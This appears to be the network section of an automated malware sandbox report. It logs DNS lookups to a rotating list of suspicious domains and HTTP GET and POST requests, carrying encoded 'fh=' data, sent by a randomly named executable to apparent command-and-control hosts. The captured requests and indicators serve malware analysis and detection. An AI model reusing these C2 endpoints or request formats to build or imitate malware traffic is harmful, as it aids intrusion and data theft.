                                                                                Dec 3, 2024 14:22:29.471649885 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471743107 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471781969 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.476870060 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.597326994 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:35.289513111 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:35.409524918 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:35.409627914 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:35.430665970 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:35.551661968 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:36.727591038 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:36.727695942 CET8049943209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:36.727816105 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:36.934202909 CET4994380192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:37.952749014 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:38.072910070 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:38.072988987 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:38.088601112 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:38.208873987 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:39.404553890 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:39.404752016 CET8049949209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:39.404799938 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:39.590486050 CET4994980192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.617607117 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.737657070 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:40.737818956 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.753995895 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:40.874272108 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:40.874288082 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:42.087258101 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:42.087368965 CET8049955209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:42.087413073 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:42.262341976 CET4995580192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.327927113 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.448951960 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:43.449042082 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.464313030 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:43.584455967 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:44.685353041 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:44.685461998 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:44.685626984 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:44.689620972 CET4996180192.168.2.5209.74.77.107
                                                                                Dec 3, 2024 14:22:44.809712887 CET8049961209.74.77.107192.168.2.5
                                                                                Dec 3, 2024 14:22:50.199831009 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:50.320168972 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:50.324665070 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:50.343693018 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:50.463877916 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:51.858640909 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:51.858743906 CET804997838.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:51.858807087 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:51.887032986 CET4997880192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:52.909696102 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:53.030486107 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:53.030601025 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:53.051351070 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:53.172271013 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.605715990 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:54.666712046 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.666985989 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.669764042 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:54.669764042 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:54.725693941 CET804998538.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:54.728125095 CET4998580192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.610388994 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.730679035 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:55.730782032 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.747797012 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:55.868020058 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:55.868037939 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.262491941 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:57.322221994 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.322299957 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:57.322360992 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.322407961 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:22:57.382781029 CET804999238.47.207.164192.168.2.5
                                                                                Dec 3, 2024 14:22:57.382925987 CET4999280192.168.2.538.47.207.164
                                                                                Dec 3, 2024 14:24:30.995690107 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:31.012573957 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:31.132716894 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351155043 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351174116 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351193905 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351219893 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351229906 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351243019 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351255894 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351289988 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.351290941 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.351345062 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.351561069 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351573944 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351587057 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.351599932 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.351663113 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.471890926 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.471930027 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.475967884 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.476062059 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.529031992 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.529242992 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.551994085 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.552067995 CET8050024108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:32.554441929 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:32.554441929 CET5002480192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:33.553453922 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:33.674470901 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:33.674551964 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:33.704130888 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:33.824930906 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024609089 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024626017 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024703026 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024724007 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.024741888 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024847031 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024912119 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024925947 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.024936914 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.024965048 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.025064945 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.025075912 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.025088072 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.025113106 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.025341988 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.145203114 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.145411015 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.145507097 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.216342926 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.225629091 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.225704908 CET8050025108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:35.225755930 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:35.225755930 CET5002580192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:36.235059977 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:36.355252981 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:36.358396053 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:36.372147083 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:36.492582083 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:36.492624998 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768307924 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768330097 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768345118 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768382072 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768398046 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.768399954 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768414021 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768429995 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768440962 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.768459082 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.768634081 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768646002 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768659115 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.768675089 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.768732071 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.888016939 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.888576031 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.888631105 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.888631105 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.888680935 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.978538036 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.978558064 CET8050026108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:37.978583097 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:37.978614092 CET5002680192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:38.906864882 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:39.027950048 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:39.030543089 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:39.042434931 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:39.163765907 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:40.264003038 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:40.321300030 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:45.265116930 CET8050027108.179.253.197192.168.2.5
                                                                                Dec 3, 2024 14:24:45.265353918 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:45.268526077 CET5002780192.168.2.5108.179.253.197
                                                                                Dec 3, 2024 14:24:45.388633013 CET8050027108.179.253.197192.168.2.5
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 3, 2024 14:21:22.297384977 CET6412653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:22.523171902 CET53641261.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:21:27.532414913 CET5405653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:27.762589931 CET53540561.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:21:32.781636953 CET6514953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:33.604335070 CET53651491.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:21:50.000390053 CET6044353192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:21:50.500212908 CET53604431.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:04.842878103 CET6405553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:05.138133049 CET53640551.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:19.595257998 CET5851753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:20.193849087 CET53585171.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:34.485311031 CET5633153192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:35.286071062 CET53563311.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:22:49.704833031 CET5042853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:22:50.193674088 CET53504281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:05.063889027 CET6392553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:06.007435083 CET53639251.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:20.329929113 CET6258153192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:20.884874105 CET53625811.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:28.955986977 CET6115853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:29.283931017 CET53611581.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:23:45.298070908 CET5726053192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:23:45.628345013 CET53572601.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:24:00.188851118 CET5825753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:24:00.891268015 CET53582571.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:24:15.204896927 CET6486953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:24:15.651241064 CET53648691.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:24:30.033749104 CET6308153192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:24:30.872323036 CET53630811.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 14:21:22.297384977 CET | 192.168.2.5 | 1.1.1.1 | 0x65cb | Standard query (0) | www.betmatchx.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:27.532414913 CET | 192.168.2.5 | 1.1.1.1 | 0xb9c | Standard query (0) | www.egldfi.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:32.781636953 CET | 192.168.2.5 | 1.1.1.1 | 0xc44 | Standard query (0) | www.remedies.pro | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:50.000390053 CET | 192.168.2.5 | 1.1.1.1 | 0x322d | Standard query (0) | www.egyshare.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:04.842878103 CET | 192.168.2.5 | 1.1.1.1 | 0xcaff | Standard query (0) | www.appsolucao.shop | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:19.595257998 CET | 192.168.2.5 | 1.1.1.1 | 0x6c4c | Standard query (0) | www.samundri.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:34.485311031 CET | 192.168.2.5 | 1.1.1.1 | 0x9cb2 | Standard query (0) | www.happyjam.life | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:49.704833031 CET | 192.168.2.5 | 1.1.1.1 | 0xf812 | Standard query (0) | www.t19yd.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:05.063889027 CET | 192.168.2.5 | 1.1.1.1 | 0xe9a0 | Standard query (0) | www.atendefacil.info | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:20.329929113 CET | 192.168.2.5 | 1.1.1.1 | 0x11fe | Standard query (0) | www.uynline.shop | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:28.955986977 CET | 192.168.2.5 | 1.1.1.1 | 0x8f76 | Standard query (0) | www.sitioseguro.blog | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:45.298070908 CET | 192.168.2.5 | 1.1.1.1 | 0xa376 | Standard query (0) | www.dating-apps-az-dn5.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:00.188851118 CET | 192.168.2.5 | 1.1.1.1 | 0x77e6 | Standard query (0) | www.whisperart.net | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:15.204896927 CET | 192.168.2.5 | 1.1.1.1 | 0xca92 | Standard query (0) | www.ana-silverco.shop | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:30.033749104 CET | 192.168.2.5 | 1.1.1.1 | 0xe307 | Standard query (0) | www.bloodbalancecaps.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:21:22.523171902 CET | 1.1.1.1 | 192.168.2.5 | 0x65cb | Name error (3) | www.betmatchx.online | none | none | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:27.762589931 CET | 1.1.1.1 | 192.168.2.5 | 0xb9c | Name error (3) | www.egldfi.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:33.604335070 CET | 1.1.1.1 | 192.168.2.5 | 0xc44 | No error (0) | www.remedies.pro |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:33.604335070 CET | 1.1.1.1 | 192.168.2.5 | 0xc44 | No error (0) | www.remedies.pro |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:50.500212908 CET | 1.1.1.1 | 192.168.2.5 | 0x322d | No error (0) | www.egyshare.xyz |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:21:50.500212908 CET | 1.1.1.1 | 192.168.2.5 | 0x322d | No error (0) | www.egyshare.xyz |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:05.138133049 CET | 1.1.1.1 | 192.168.2.5 | 0xcaff | No error (0) | www.appsolucao.shop | appsolucao.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:22:05.138133049 CET | 1.1.1.1 | 192.168.2.5 | 0xcaff | No error (0) | appsolucao.shop |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:20.193849087 CET | 1.1.1.1 | 192.168.2.5 | 0x6c4c | No error (0) | www.samundri.online | samundri.online |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:22:20.193849087 CET | 1.1.1.1 | 192.168.2.5 | 0x6c4c | No error (0) | samundri.online |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:35.286071062 CET | 1.1.1.1 | 192.168.2.5 | 0x9cb2 | No error (0) | www.happyjam.life |  | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:22:50.193674088 CET | 1.1.1.1 | 192.168.2.5 | 0xf812 | No error (0) | www.t19yd.top | t19yd.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:22:50.193674088 CET | 1.1.1.1 | 192.168.2.5 | 0xf812 | No error (0) | t19yd.top |  | 38.47.207.164 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:06.007435083 CET | 1.1.1.1 | 192.168.2.5 | 0xe9a0 | No error (0) | www.atendefacil.info |  | 208.115.225.220 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:20.884874105 CET | 1.1.1.1 | 192.168.2.5 | 0x11fe | No error (0) | www.uynline.shop | uynline.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:23:29.283931017 CET | 1.1.1.1 | 192.168.2.5 | 0x8f76 | No error (0) | www.sitioseguro.blog |  | 104.21.15.100 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:29.283931017 CET | 1.1.1.1 | 192.168.2.5 | 0x8f76 | No error (0) | www.sitioseguro.blog |  | 172.67.162.39 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:23:45.628345013 CET | 1.1.1.1 | 192.168.2.5 | 0xa376 | No error (0) | www.dating-apps-az-dn5.xyz |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:00.891268015 CET | 1.1.1.1 | 192.168.2.5 | 0x77e6 | No error (0) | www.whisperart.net |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:15.651241064 CET | 1.1.1.1 | 192.168.2.5 | 0xca92 | No error (0) | www.ana-silverco.shop |  | 172.67.156.195 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:15.651241064 CET | 1.1.1.1 | 192.168.2.5 | 0xca92 | No error (0) | www.ana-silverco.shop |  | 104.21.90.137 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:24:30.872323036 CET | 1.1.1.1 | 192.168.2.5 | 0xe307 | No error (0) | www.bloodbalancecaps.shop | bloodbalancecaps.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:24:30.872323036 CET | 1.1.1.1 | 192.168.2.5 | 0xe307 | No error (0) | bloodbalancecaps.shop |  | 108.179.253.197 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49796 | 13.248.169.48 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:21:33.868537903 CET | 524 | OUT | GET /8ewn/?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.remedies.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 3, 2024 14:21:34.946650982 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 03 Dec 2024 13:21:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 270
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fh=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblIvsB4LfBbF1oBXzvh2mLP4bfiHovBjqCi6jVggqxg==&jnGlY=dHeXwH1PkJZDr"}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                1 | 192.168.2.5 | 49833 | 13.248.169.48 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:21:50.638335943 CET | 777 | OUT | POST /440l/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.egyshare.xyz
                                                                                Origin: http://www.egyshare.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.egyshare.xyz/440l/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chHzlwn8e1xvJYhLiGryI9hG9YMlCHEMsL5QY=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.2.5 | 49839 | 13.248.169.48 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:21:53.309835911 CET | 797 | OUT | POST /440l/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.egyshare.xyz
                                                                                Origin: http://www.egyshare.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.egyshare.xyz/440l/
